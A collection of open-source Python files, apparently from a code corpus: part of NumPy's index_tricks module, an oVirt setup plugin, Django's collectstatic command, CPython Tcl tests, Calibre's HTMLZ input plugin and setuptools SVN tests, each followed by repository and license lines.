key0 = key[0] if key0 in 'rc': self.matrix = True self.col = (key0 == 'c') continue if ',' in key0: vec = key0.split(',') try: self.axis, ndmin = \ [int(x) for x in vec[:2]] if len(vec) == 3: trans1d = int(vec[2]) continue except: raise ValueError, "unknown special directive" try: self.axis = int(key[k]) continue except (ValueError, TypeError): raise ValueError, "unknown special directive" elif type(key[k]) in ScalarType: newobj = array(key[k],ndmin=ndmin) scalars.append(k) scalar = True scalartypes.append(newobj.dtype) else: newobj = key[k] if ndmin > 1: tempobj = array(newobj, copy=False, subok=True) newobj = array(newobj, copy=False, subok=True, ndmin=ndmin) if trans1d != -1 and tempobj.ndim < ndmin: k2 = ndmin-tempobj.ndim if (trans1d < 0): trans1d += k2 + 1 defaxes = range(ndmin) k1 = trans1d axes = defaxes[:k1] + defaxes[k2:] + \ defaxes[k1:k2] newobj = newobj.transpose(axes) del tempobj objs.append(newobj) if not scalar and isinstance(newobj, _nx.ndarray): arraytypes.append(newobj.dtype) # Esure that scalars won't up-cast unless warranted final_dtype = find_common_type(arraytypes, scalartypes) if final_dtype is not None: for k in scalars: objs[k] = objs[k].astype(final_dtype) res = _nx.concatenate(tuple(objs),axis=self.axis) return self._retval(res) def __getslice__(self,i,j): res = _nx.arange(i,j) return self._retval(res) def __len__(self): return 0 # separate classes are used here instead of just making r_ = concatentor(0), # etc. because otherwise we couldn't get the doc string to come out right # in help(r_) class RClass(AxisConcatenator): """ Translates slice objects to concatenation along the first axis. This is a simple way to build up arrays quickly. There are two use cases. 1. If the index expression contains comma separated arrays, then stack them along their first axis. 2. If the index expression contains slice notation or scalars then create a 1-D array with a range indicated by the slice notation. 
If slice notation is used, the syntax ``start:stop:step`` is equivalent to ``np.arange(start, stop, step)`` inside of the brackets. However, if ``step`` is an imaginary number (i.e. 100j) then its integer portion is interpreted as a number-of-points desired and the start and stop are inclusive. In other words ``start:stop:stepj`` is interpreted as ``np.linspace(start, stop, step, endpoint=1)`` inside of the brackets. After expansion of slice notation, all comma separated sequences are concatenated together. Optional character strings placed as the first element of the index expression can be used to change the output. The strings 'r' or 'c' result in matrix output. If the result is 1-D and 'r' is specified a 1 x N (row) matrix is produced. If the result is 1-D and 'c' is specified, then a N x 1 (column) matrix is produced. If the result is 2-D then both provide the same matrix result. A string integer specifies which axis to stack multiple comma separated arrays along. A string of two comma-separated integers allows indication of the minimum number of dimensions to force each entry into as the second integer (the axis to concatenate along is still the first integer). A string with three comma-separated integers allows specification of the axis to concatenate along, the minimum number of dimensions to force the entries to, and which axis should contain the start of the arrays which are less than the specified number of dimensions. In other words the third integer allows you to specify where the 1's should be placed in the shape of the arrays that have their shapes upgraded. By default, they are placed in the front of the shape tuple. The third argument allows you to specify where the start of the array should be instead. Thus, a third argument of '0' would place the 1's at the end of the array shape. Negative integers specify where in the new shape tuple the last dimension of upgraded arrays should be placed, so the default is '-1'. 
Parameters ---------- Not a function, so takes no parameters Returns ------- A concatenated ndarray or matrix. See Also -------- concatenate : Join a sequence of arrays together. c_ : Translates slice objects to concatenation along the second axis. Examples -------- >>> np.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])] array([1, 2, 3, 0, 0, 4, 5, 6]) >>> np.r_[-1:1:6j, [0]*3, 5, 6] array([-1. , -0.6, -0.2, 0.2, 0.6, 1. , 0. , 0. , 0. , 5. , 6. ]) String integers specify the axis to concatenate along or the minimum number of dimensions to force entries into. >>> a = np.array([[0, 1, 2], [3, 4, 5]]) >>> np.r_['-1', a, a] # concatenate along last axis array([[0, 1, 2, 0, 1, 2], [3, 4, 5, 3, 4, 5]]) >>> np.r_['0,2', [1,2,3], [4,5,6]] # concatenate along first axis, dim>=2 array([[1, 2, 3], [4, 5, 6]]) >>> np.r_['0,2,0', [1,2,3], [4,5,6]] array([[1], [2], [3], [4], [5], [6]]) >>> np.r_['1,2,0', [1,2,3], [4,5,6]] array([[1, 4], [2, 5], [3, 6]]) Using 'r' or 'c' as a first string argument creates a matrix. >>> np.r_['r',[1,2,3], [4,5,6]] matrix([[1, 2, 3, 4, 5, 6]]) """ def __init__(self): AxisConcatenator.__init__(self, 0) r_ = RClass() class CClass(AxisConcatenator): """ Translates slice objects to concatenation along the second axis. This is short-hand for ``np.r_['-1,2,0', index expression]``, which is useful because of its common occurrence. In particular, arrays will be stacked along their last axis after being upgraded to at least 2-D with 1's post-pended to the shape (column vectors made out of 1-D arrays). For detailed documentation, see `r_`. Examples -------- >>> np.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])] array([[1, 2, 3, 0, 0, 4, 5, 6]]) """ def __init__(self): AxisConcatenator.__init__(self, -1, ndmin=2, trans1d=0) c_ = CClass() class ndenumerate(object): """ Multidimensional index iterator. Return an iterator yielding pairs of array coordinates and values. Parameters ---------- a : ndarray Input array. 
See Also -------- ndindex, flatiter Examples -------- >>> a = np.array([[1, 2], [3, 4]]) >>> for index, x in np.ndenumerate(a): ... print index, x (0, 0) 1 (0, 1) 2 (1, 0) 3 (1, 1) 4 """ def __init__(self, arr): self.iter = asarray(arr).flat def next(self): """ Standard iterator method, returns the index tuple and array value. Returns ------- coords : tuple of ints The indices of the current iteration. val : scalar The array element of the current iteration. """ return self.iter.coords, self.iter.next() def __iter__(self): return self class ndindex(object): """ An N-dimensional iterator object to index arrays. Given the shape of an array, an `ndindex` instance iterates over the N-dimensional index of the array. At each iteration a tuple of indices is returned, the last dimension is iterated over first. Parameters ---------- `*args` : ints The size of each dimension of the array. See Also -------- ndenumerate, flatiter Examples -------- >>> for index in np.ndindex(3, 2, 1): ... print index (0, 0, 0) (0, 1, 0) (1, 0, 0) (1, 1, 0) (2, 0, 0) (2, 1, 0) """ def __init__(self, *args): if len(args) == 1 and isinstance(args[0], tuple): args = args[0] self.nd = len(args) self.ind = [0]*self.nd self.index = 0 self.maxvals = args tot = 1 for k in range(self.nd): tot *= args[k] self.total = tot def _incrementone(self, axis): if (axis < 0): # base case return if (self.ind[axis] < self.maxvals[axis]-1): self.ind[axis] += 1 else: self.ind[axis] = 0 self._incrementone(axis-1) def ndincr(self): """ Increment the multi-dimensional index by one. `ndincr` takes care of the "wrapping around" of the axes. It is called by `ndindex.next` and not normally used directly. """ self._incrementone(self.nd-1) def next(self): """ Standard iterator method, updates the index and returns the index tuple. Returns ------- val : tuple of ints Returns a tuple containing the indices of the current iteration. 
""" if (self.index >= self.total): raise StopIteration val = tuple(self.ind) self.index += 1 self.ndincr() return val def __iter__(self): return self # You can do all this with slice() plus a few special objects, # but there's a lot to remember. This version is simpler because # it uses the standard array indexing syntax. # # Written by Konrad Hinsen <hinsen@cnrs-orleans.fr> # last revision: 1999-7-23 # # Cosmetic changes by T. Oliphant 2001 # # class IndexExpression(object): """ A nicer way to build up index tuples for arrays. .. note:: Use one of the two predefined instances `index_exp` or `s_` rather than directly using `IndexExpression`. For any index combination, including slicing and axis insertion, ``a[indices]`` is the same as ``a[np.index_exp[indices]]`` for any array `a`. However, ``np.index_exp[indices]`` can be used anywhere in Python code and returns a tuple of slice objects that can be used in the construction of complex index expressions. Parameters ---------- maketuple : bool If True, always returns a tuple. See Also -------- index_exp : Predefined instance that always returns a tuple: `index_exp = IndexExpression(maketuple=True)`. s_ : Predefined instance without tuple conversion: `s_ = IndexExpression(maketuple=False)`. Notes ----- You can do all this with `slice()` plus a few special objects, but there's a lot to remember and this version is simpler because it uses the standard array indexing syntax. Examples -------- >>> np.s_[2::2] slice(2, None, 2) >>> np.index_exp[2::2] (slice(2, None, 2),) >>> np.array([0, 1, 2, 3, 4])[np.s_[2::2]] array([2, 4]) """ def __init__(self, maketuple): self.maketuple = maketuple def __getitem__(self, item): if self.maketuple and type(item) != tuple: return (item,) else: return item index_exp = IndexExpression(maketuple=True) s_ = IndexExpression(maketuple=False) # End contribution from Konrad. # The following functions complement those in twodim_base, but are # applicable to N-dimensions. 
def fill_diagonal(a, val): """ Fill the main diagonal of the given array of any dimensionality. For an array `a` with ``a.ndim > 2``, the diagonal is the list of locations with indices ``a[i, i, ..., i]`` all identical. This function modifies the input array in-place, it does not return a value. Parameters ---------- a : array, at least 2-D. Array whose diagonal is to be filled, it gets modified in-place. val : scalar Value to be written on the diagonal, its type must be compatible with that of the array a. See also -------- diag_indices, diag_indices_from Notes ----- .. versionadded:: 1.4.0 This functionality can be obtained via `diag_indices`, but internally this version uses a much faster implementation that never constructs the indices and uses simple slicing. Examples -------- >>> a = np.zeros((3, 3), int) >>> np.fill_diagonal(a, 5) >>> a array([[5, 0, 0], [0, 5, 0], [0, 0, 5]]) The same function can operate on a 4-D array: >>> a = np.zeros((3, 3, 3, 3), int) >>> np.fill_diagonal(a, 4) We only show a few blocks for clarity: >>> a[0, 0] array([[4, 0, 0], [0, 0, 0], [0, 0, 0]]) >>> a[1, 1] array([[0, 0, 0], [0, 4, 0], [0, 0, 0]]) >>> a[2, 2] array([[0, 0, 0], [0, 0, 0], [0, 0, 4]]) """ if a.ndim < 2: raise ValueError("array must be at least 2-d") if a.ndim == 2: # Explicit, fast formula for the common case. For 2-d arrays, we # accept rectangular ones. step = a.shape[1] + 1 else: # For more than d=2, the strided formula is only valid for arrays with # all dimensions equal, so we check first. if not alltrue(diff(a.shape)==0): raise ValueError("All dimensions of input must be of equal length") step = 1 + (cumprod(a.shape[:-1])).sum() # Write the value out into the diagonal. a.flat[::step] = val def diag_indices(n, ndim=2): """ Return the indices to access the main diagonal of an array. This returns a tuple of indices that can be used to access the main diagonal of an array `a` with ``a.ndim >= 2`` dimensions and shape (n, n, ..., n). 
For ``a.ndim = 2`` this is the usual diagonal, for ``a.ndim > 2`` this is the set of indices to access ``a[i, i, ..., i]`` for ``i = [0..n-1]``. Parameters ---------- n : int The size, along each dimension, of the arrays for which the returned indices can be used. ndim : int, optional The number of dimensions. See also -------- diag_indices_from Notes ----- .. versionadded:: 1.4.0 Examples -------- Create a set of indices to access the diagonal of a (4, 4) array: >>> di = np.diag_indices(4) >>> di (array([0, 1, 2, 3]), array([0, 1, 2, 3])) >>> a = np.arange(16).reshape(4, 4) >>> a array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15]]) >>> a[di] = 100 >>> a array([[100, 1, 2, 3], [ 4, 100, 6, 7], [ 8, 9, 100, 11], [ 12, 13, 14, 100]]) Now, we create indices to manipulate a 3-D array: >>> d3 = np.diag_indices(2, 3) >>> d3 (array([0, 1]), array([0, 1]), array([0, 1])) And use it to set the diagonal of an array of zeros to 1: >>> a = np.zeros((2, 2, 2), dtype=np.int) >>> a[d3] = 1 >>> a array([[[1, 0], [0, 0]], [[0, 0], [0, 1]]]) """ idx = arange(n) return (idx,) * ndim def diag_indices_from(arr): """ Return the indices to access the main diagonal of an n-dimensional array. See `diag_indices` for full details. Parameters ---------- arr : array, at least 2-D See Also -------- diag_indices Notes ----- .. versionadded:: 1.4.0 """ if not arr.ndim >= 2: raise ValueError("input array must be at least 2-d") # For more than d=2, the strided formula is only valid for arrays with # all dimensions equal, so we check first. if not alltrue(diff(arr.shape) == 0): raise ValueError("All dimensions of input must be of equal length") return diag_indices(arr.shape[0], arr.ndim)
gpl-3.0
walteryang47/ovirt-engine
packaging/setup/plugins/ovirt-engine-common/ovirt-engine/core/fence_kdump_listener.py
8
2091
# # ovirt-engine-setup -- ovirt engine setup # Copyright (C) 2014-2015 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """fence_kdump listener plugin.""" import gettext from otopi import plugin, util from ovirt_engine_setup import constants as osetupcons from ovirt_engine_setup.engine import constants as oenginecons from ovirt_engine_setup.engine_common import constants as oengcommcons def _(m): return gettext.dgettext(message=m, domain='ovirt-engine-setup') @util.export class Plugin(plugin.PluginBase): """fence_kdump listener plugin.""" def __init__(self, context): super(Plugin, self).__init__(context=context) @plugin.event( stage=plugin.Stages.STAGE_INIT, ) def _init(self): self.environment.setdefault( oengcommcons.ConfigEnv.FENCE_KDUMP_LISTENER_STOP_NEEDED, False ) @plugin.event( stage=plugin.Stages.STAGE_TRANSACTION_BEGIN, condition=lambda self: not self.environment[ osetupcons.CoreEnv.DEVELOPER_MODE ] and self.environment[ oengcommcons.ConfigEnv.FENCE_KDUMP_LISTENER_STOP_NEEDED ], ) def _transactionBegin(self): if self.services.exists( name=oenginecons.Const.FENCE_KDUMP_LISTENER_SERVICE_NAME, ): self.logger.info(_('Stopping ovirt-fence-kdump-listener service')) self.services.state( name=oenginecons.Const.FENCE_KDUMP_LISTENER_SERVICE_NAME, state=False ) # vim: expandtab tabstop=4 shiftwidth=4
apache-2.0
Distrotech/intellij-community
python/lib/Lib/site-packages/django/contrib/staticfiles/management/commands/collectstatic.py
71
8207
import os import sys import shutil from optparse import make_option from django.conf import settings from django.core.files.storage import get_storage_class from django.core.management.base import CommandError, NoArgsCommand from django.contrib.staticfiles import finders class Command(NoArgsCommand): """ Command that allows to copy or symlink media files from different locations to the settings.STATIC_ROOT. """ option_list = NoArgsCommand.option_list + ( make_option('--noinput', action='store_false', dest='interactive', default=True, help="Do NOT prompt the user for input of any " "kind."), make_option('-i', '--ignore', action='append', default=[], dest='ignore_patterns', metavar='PATTERN', help="Ignore files or directories matching this glob-style " "pattern. Use multiple times to ignore more."), make_option('-n', '--dry-run', action='store_true', dest='dry_run', default=False, help="Do everything except modify the filesystem."), make_option('-l', '--link', action='store_true', dest='link', default=False, help="Create a symbolic link to each file instead of copying."), make_option('--no-default-ignore', action='store_false', dest='use_default_ignore_patterns', default=True, help="Don't ignore the common private glob-style patterns 'CVS', " "'.*' and '*~'."), ) help = "Collect static files from apps and other locations in a single location." 
def handle_noargs(self, **options): symlink = options['link'] ignore_patterns = options['ignore_patterns'] if options['use_default_ignore_patterns']: ignore_patterns += ['CVS', '.*', '*~'] ignore_patterns = list(set(ignore_patterns)) self.copied_files = set() self.symlinked_files = set() self.unmodified_files = set() self.destination_storage = get_storage_class(settings.STATICFILES_STORAGE)() try: self.destination_storage.path('') except NotImplementedError: self.destination_local = False else: self.destination_local = True if symlink: if sys.platform == 'win32': raise CommandError("Symlinking is not supported by this " "platform (%s)." % sys.platform) if not self.destination_local: raise CommandError("Can't symlink to a remote destination.") # Warn before doing anything more. if options.get('interactive'): confirm = raw_input(""" You have requested to collate static files and collect them at the destination location as specified in your settings file. This will overwrite existing files. Are you sure you want to do this? Type 'yes' to continue, or 'no' to cancel: """) if confirm != 'yes': raise CommandError("Static files build cancelled.") # Use ints for file times (ticket #14665) os.stat_float_times(False) for finder in finders.get_finders(): for source, prefix, storage in finder.list(ignore_patterns): self.copy_file(source, prefix, storage, **options) verbosity = int(options.get('verbosity', 1)) actual_count = len(self.copied_files) + len(self.symlinked_files) unmodified_count = len(self.unmodified_files) if verbosity >= 1: self.stdout.write("\n%s static file%s %s to '%s'%s.\n" % (actual_count, actual_count != 1 and 's' or '', symlink and 'symlinked' or 'copied', settings.STATIC_ROOT, unmodified_count and ' (%s unmodified)' % unmodified_count or '')) def copy_file(self, source, prefix, source_storage, **options): """ Attempt to copy (or symlink) ``source`` to ``destination``, returning True if successful. 
""" source_path = source_storage.path(source) try: source_last_modified = source_storage.modified_time(source) except (OSError, NotImplementedError): source_last_modified = None if prefix: destination = '/'.join([prefix, source]) else: destination = source symlink = options['link'] dry_run = options['dry_run'] verbosity = int(options.get('verbosity', 1)) if destination in self.copied_files: if verbosity >= 2: self.stdout.write("Skipping '%s' (already copied earlier)\n" % destination) return False if destination in self.symlinked_files: if verbosity >= 2: self.stdout.write("Skipping '%s' (already linked earlier)\n" % destination) return False if self.destination_storage.exists(destination): try: destination_last_modified = \ self.destination_storage.modified_time(destination) except (OSError, NotImplementedError): # storage doesn't support ``modified_time`` or failed. pass else: destination_is_link = os.path.islink( self.destination_storage.path(destination)) if destination_last_modified >= source_last_modified: if (not symlink and not destination_is_link): if verbosity >= 2: self.stdout.write("Skipping '%s' (not modified)\n" % destination) self.unmodified_files.add(destination) return False if dry_run: if verbosity >= 2: self.stdout.write("Pretending to delete '%s'\n" % destination) else: if verbosity >= 2: self.stdout.write("Deleting '%s'\n" % destination) self.destination_storage.delete(destination) if symlink: destination_path = self.destination_storage.path(destination) if dry_run: if verbosity >= 1: self.stdout.write("Pretending to symlink '%s' to '%s'\n" % (source_path, destination_path)) else: if verbosity >= 1: self.stdout.write("Symlinking '%s' to '%s'\n" % (source_path, destination_path)) try: os.makedirs(os.path.dirname(destination_path)) except OSError: pass os.symlink(source_path, destination_path) self.symlinked_files.add(destination) else: if dry_run: if verbosity >= 1: self.stdout.write("Pretending to copy '%s' to '%s'\n" % (source_path, 
destination)) else: if self.destination_local: destination_path = self.destination_storage.path(destination) try: os.makedirs(os.path.dirname(destination_path)) except OSError: pass shutil.copy2(source_path, destination_path) if verbosity >= 1: self.stdout.write("Copying '%s' to '%s'\n" % (source_path, destination_path)) else: source_file = source_storage.open(source) self.destination_storage.save(destination, source_file) if verbosity >= 1: self.stdout.write("Copying %s to %s\n" % (source_path, destination)) self.copied_files.add(destination) return True
apache-2.0
snasoft/QtCreatorPluginsPack
Bin/3rdParty/vera/bin/lib/test/test_tcl.py
38
4483
#!/usr/bin/env python import unittest import os from test import test_support # Skip this test if the _tkinter module wasn't built. _tkinter = test_support.import_module('_tkinter') from Tkinter import Tcl from _tkinter import TclError class TkinterTest(unittest.TestCase): def testFlattenLen(self): # flatten(<object with no length>) self.assertRaises(TypeError, _tkinter._flatten, True) class TclTest(unittest.TestCase): def setUp(self): self.interp = Tcl() def testEval(self): tcl = self.interp tcl.eval('set a 1') self.assertEqual(tcl.eval('set a'),'1') def testEvalException(self): tcl = self.interp self.assertRaises(TclError,tcl.eval,'set a') def testEvalException2(self): tcl = self.interp self.assertRaises(TclError,tcl.eval,'this is wrong') def testCall(self): tcl = self.interp tcl.call('set','a','1') self.assertEqual(tcl.call('set','a'),'1') def testCallException(self): tcl = self.interp self.assertRaises(TclError,tcl.call,'set','a') def testCallException2(self): tcl = self.interp self.assertRaises(TclError,tcl.call,'this','is','wrong') def testSetVar(self): tcl = self.interp tcl.setvar('a','1') self.assertEqual(tcl.eval('set a'),'1') def testSetVarArray(self): tcl = self.interp tcl.setvar('a(1)','1') self.assertEqual(tcl.eval('set a(1)'),'1') def testGetVar(self): tcl = self.interp tcl.eval('set a 1') self.assertEqual(tcl.getvar('a'),'1') def testGetVarArray(self): tcl = self.interp tcl.eval('set a(1) 1') self.assertEqual(tcl.getvar('a(1)'),'1') def testGetVarException(self): tcl = self.interp self.assertRaises(TclError,tcl.getvar,'a') def testGetVarArrayException(self): tcl = self.interp self.assertRaises(TclError,tcl.getvar,'a(1)') def testUnsetVar(self): tcl = self.interp tcl.setvar('a',1) self.assertEqual(tcl.eval('info exists a'),'1') tcl.unsetvar('a') self.assertEqual(tcl.eval('info exists a'),'0') def testUnsetVarArray(self): tcl = self.interp tcl.setvar('a(1)',1) tcl.setvar('a(2)',2) self.assertEqual(tcl.eval('info exists a(1)'),'1') 
self.assertEqual(tcl.eval('info exists a(2)'),'1') tcl.unsetvar('a(1)') self.assertEqual(tcl.eval('info exists a(1)'),'0') self.assertEqual(tcl.eval('info exists a(2)'),'1') def testUnsetVarException(self): tcl = self.interp self.assertRaises(TclError,tcl.unsetvar,'a') def testEvalFile(self): tcl = self.interp filename = "testEvalFile.tcl" fd = open(filename,'w') script = """set a 1 set b 2 set c [ expr $a + $b ] """ fd.write(script) fd.close() tcl.evalfile(filename) os.remove(filename) self.assertEqual(tcl.eval('set a'),'1') self.assertEqual(tcl.eval('set b'),'2') self.assertEqual(tcl.eval('set c'),'3') def testEvalFileException(self): tcl = self.interp filename = "doesnotexists" try: os.remove(filename) except Exception,e: pass self.assertRaises(TclError,tcl.evalfile,filename) def testPackageRequireException(self): tcl = self.interp self.assertRaises(TclError,tcl.eval,'package require DNE') def testLoadWithUNC(self): import sys if sys.platform != 'win32': return # Build a UNC path from the regular path. # Something like # \\%COMPUTERNAME%\c$\python27\python.exe fullname = os.path.abspath(sys.executable) if fullname[1] != ':': return unc_name = r'\\%s\%s$\%s' % (os.environ['COMPUTERNAME'], fullname[0], fullname[3:]) with test_support.EnvironmentVarGuard() as env: env.unset("TCL_LIBRARY") f = os.popen('%s -c "import Tkinter; print Tkinter"' % (unc_name,)) self.assertTrue('Tkinter.py' in f.read()) # exit code must be zero self.assertEqual(f.close(), None) def test_main(): test_support.run_unittest(TclTest, TkinterTest) if __name__ == "__main__": test_main()
lgpl-3.0
timpalpant/calibre
src/calibre/ebooks/conversion/plugins/htmlz_input.py
15
4783
# -*- coding: utf-8 -*- from __future__ import (unicode_literals, division, absolute_import, print_function) __license__ = 'GPL 3' __copyright__ = '2011, John Schember <john@nachtimwald.com>' __docformat__ = 'restructuredtext en' import os from calibre import guess_type from calibre.customize.conversion import InputFormatPlugin class HTMLZInput(InputFormatPlugin): name = 'HTLZ Input' author = 'John Schember' description = 'Convert HTML files to HTML' file_types = set(['htmlz']) def convert(self, stream, options, file_ext, log, accelerators): from calibre.ebooks.chardet import xml_to_unicode from calibre.ebooks.metadata.opf2 import OPF from calibre.utils.zipfile import ZipFile self.log = log html = u'' top_levels = [] # Extract content from zip archive. zf = ZipFile(stream) zf.extractall() # Find the HTML file in the archive. It needs to be # top level. index = u'' multiple_html = False # Get a list of all top level files in the archive. for x in os.listdir(u'.'): if os.path.isfile(x): top_levels.append(x) # Try to find an index. file. for x in top_levels: if x.lower() in (u'index.html', u'index.xhtml', u'index.htm'): index = x break # Look for multiple HTML files in the archive. We look at the # top level files only as only they matter in HTMLZ. for x in top_levels: if os.path.splitext(x)[1].lower() in (u'.html', u'.xhtml', u'.htm'): # Set index to the first HTML file found if it's not # called index. if not index: index = x else: multiple_html = True # Warn the user if there multiple HTML file in the archive. HTMLZ # supports a single HTML file. A conversion with a multiple HTML file # HTMLZ archive probably won't turn out as the user expects. With # Multiple HTML files ZIP input should be used in place of HTMLZ. if multiple_html: log.warn(_('Multiple HTML files found in the archive. 
Only %s will be used.') % index) if index: with open(index, 'rb') as tf: html = tf.read() else: raise Exception(_('No top level HTML file found.')) if not html: raise Exception(_('Top level HTML file %s is empty') % index) # Encoding if options.input_encoding: ienc = options.input_encoding else: ienc = xml_to_unicode(html[:4096])[-1] html = html.decode(ienc, 'replace') # Run the HTML through the html processing plugin. from calibre.customize.ui import plugin_for_input_format html_input = plugin_for_input_format('html') for opt in html_input.options: setattr(options, opt.option.name, opt.recommended_value) options.input_encoding = 'utf-8' base = os.getcwdu() fname = os.path.join(base, u'index.html') c = 0 while os.path.exists(fname): c += 1 fname = u'index%d.html'%c htmlfile = open(fname, 'wb') with htmlfile: htmlfile.write(html.encode('utf-8')) odi = options.debug_pipeline options.debug_pipeline = None # Generate oeb from html conversion. oeb = html_input.convert(open(htmlfile.name, 'rb'), options, 'html', log, {}) options.debug_pipeline = odi os.remove(htmlfile.name) # Set metadata from file. from calibre.customize.ui import get_file_type_metadata from calibre.ebooks.oeb.transforms.metadata import meta_info_to_oeb_metadata mi = get_file_type_metadata(stream, file_ext) meta_info_to_oeb_metadata(mi, oeb.metadata, log) # Get the cover path from the OPF. cover_path = None opf = None for x in top_levels: if os.path.splitext(x)[1].lower() == u'.opf': opf = x break if opf: opf = OPF(opf, basedir=os.getcwdu()) cover_path = opf.raster_cover or opf.cover # Set the cover. if cover_path: cdata = None with open(os.path.join(os.getcwdu(), cover_path), 'rb') as cf: cdata = cf.read() cover_name = os.path.basename(cover_path) id, href = oeb.manifest.generate('cover', cover_name) oeb.manifest.add(id, href, guess_type(cover_name)[0], data=cdata) oeb.guide.add('cover', 'Cover', href) return oeb
gpl-3.0
freakynit/vertx-web
src/test/sockjs-protocol/venv/lib/python2.7/site-packages/setuptools/tests/test_svn.py
300
7806
# -*- coding: utf-8 -*- """svn tests""" import io import os import subprocess import sys import unittest from setuptools.tests import environment from setuptools.compat import unicode, unichr from setuptools import svn_utils from setuptools.tests.py26compat import skipIf def _do_svn_check(): try: subprocess.check_call(["svn", "--version"], shell=(sys.platform == 'win32')) return True except (OSError, subprocess.CalledProcessError): return False _svn_check = _do_svn_check() class TestSvnVersion(unittest.TestCase): def test_no_svn_found(self): path_variable = None for env in os.environ: if env.lower() == 'path': path_variable = env if path_variable is None: try: self.skipTest('Cannot figure out how to modify path') except AttributeError: # PY26 doesn't have this return old_path = os.environ[path_variable] os.environ[path_variable] = '' try: version = svn_utils.SvnInfo.get_svn_version() self.assertEqual(version, '') finally: os.environ[path_variable] = old_path @skipIf(not _svn_check, "No SVN to text, in the first place") def test_svn_should_exist(self): version = svn_utils.SvnInfo.get_svn_version() self.assertNotEqual(version, '') def _read_utf8_file(path): fileobj = None try: fileobj = io.open(path, 'r', encoding='utf-8') data = fileobj.read() return data finally: if fileobj: fileobj.close() class ParserInfoXML(unittest.TestCase): def parse_tester(self, svn_name, ext_spaces): path = os.path.join('setuptools', 'tests', 'svn_data', svn_name + '_info.xml') #Remember these are pre-generated to test XML parsing # so these paths might not valid on your system example_base = "%s_example" % svn_name data = _read_utf8_file(path) expected = set([ ("\\".join((example_base, 'a file')), 'file'), ("\\".join((example_base, 'folder')), 'dir'), ("\\".join((example_base, 'folder', 'lalala.txt')), 'file'), ("\\".join((example_base, 'folder', 'quest.txt')), 'file'), ]) self.assertEqual(set(x for x in svn_utils.parse_dir_entries(data)), expected) def test_svn13(self): 
self.parse_tester('svn13', False) def test_svn14(self): self.parse_tester('svn14', False) def test_svn15(self): self.parse_tester('svn15', False) def test_svn16(self): self.parse_tester('svn16', True) def test_svn17(self): self.parse_tester('svn17', True) def test_svn18(self): self.parse_tester('svn18', True) class ParserExternalXML(unittest.TestCase): def parse_tester(self, svn_name, ext_spaces): path = os.path.join('setuptools', 'tests', 'svn_data', svn_name + '_ext_list.xml') example_base = svn_name + '_example' data = _read_utf8_file(path) if ext_spaces: folder2 = 'third party2' folder3 = 'third party3' else: folder2 = 'third_party2' folder3 = 'third_party3' expected = set([ os.sep.join((example_base, folder2)), os.sep.join((example_base, folder3)), # folder is third_party大介 os.sep.join((example_base, unicode('third_party') + unichr(0x5927) + unichr(0x4ecb))), os.sep.join((example_base, 'folder', folder2)), os.sep.join((example_base, 'folder', folder3)), os.sep.join((example_base, 'folder', unicode('third_party') + unichr(0x5927) + unichr(0x4ecb))), ]) expected = set(os.path.normpath(x) for x in expected) dir_base = os.sep.join(('C:', 'development', 'svn_example')) self.assertEqual(set(x for x in svn_utils.parse_externals_xml(data, dir_base)), expected) def test_svn15(self): self.parse_tester('svn15', False) def test_svn16(self): self.parse_tester('svn16', True) def test_svn17(self): self.parse_tester('svn17', True) def test_svn18(self): self.parse_tester('svn18', True) class ParseExternal(unittest.TestCase): def parse_tester(self, svn_name, ext_spaces): path = os.path.join('setuptools', 'tests', 'svn_data', svn_name + '_ext_list.txt') data = _read_utf8_file(path) if ext_spaces: expected = set(['third party2', 'third party3', 'third party3b', 'third_party']) else: expected = set(['third_party2', 'third_party3', 'third_party']) self.assertEqual(set(x for x in svn_utils.parse_external_prop(data)), expected) def test_svn13(self): self.parse_tester('svn13', False) 
def test_svn14(self): self.parse_tester('svn14', False) def test_svn15(self): self.parse_tester('svn15', False) def test_svn16(self): self.parse_tester('svn16', True) def test_svn17(self): self.parse_tester('svn17', True) def test_svn18(self): self.parse_tester('svn18', True) class TestSvn(environment.ZippedEnvironment): def setUp(self): version = svn_utils.SvnInfo.get_svn_version() if not version: # empty or null self.dataname = None self.datafile = None return self.base_version = tuple([int(x) for x in version.split('.')[:2]]) if self.base_version < (1,3): raise ValueError('Insufficient SVN Version %s' % version) elif self.base_version >= (1,9): #trying the latest version self.base_version = (1,8) self.dataname = "svn%i%i_example" % self.base_version self.datafile = os.path.join('setuptools', 'tests', 'svn_data', self.dataname + ".zip") super(TestSvn, self).setUp() @skipIf(not _svn_check, "No SVN to text, in the first place") def test_revision(self): rev = svn_utils.SvnInfo.load('.').get_revision() self.assertEqual(rev, 6) @skipIf(not _svn_check, "No SVN to text, in the first place") def test_entries(self): expected = set([ (os.path.join('a file'), 'file'), (os.path.join('folder'), 'dir'), (os.path.join('folder', 'lalala.txt'), 'file'), (os.path.join('folder', 'quest.txt'), 'file'), #The example will have a deleted file (or should) #but shouldn't return it ]) info = svn_utils.SvnInfo.load('.') self.assertEqual(set(x for x in info.entries), expected) @skipIf(not _svn_check, "No SVN to text, in the first place") def test_externals(self): if self.base_version >= (1,6): folder2 = 'third party2' folder3 = 'third party3' else: folder2 = 'third_party2' folder3 = 'third_party3' expected = set([ os.path.join(folder2), os.path.join(folder3), os.path.join('third_party'), os.path.join('folder', folder2), os.path.join('folder', folder3), os.path.join('folder', 'third_party'), ]) info = svn_utils.SvnInfo.load('.') self.assertEqual(set([x for x in info.externals]), expected) 
def test_suite(): return unittest.defaultTestLoader.loadTestsFromName(__name__)
apache-2.0
dursk/django
django/conf/locale/pt/formats.py
504
1717
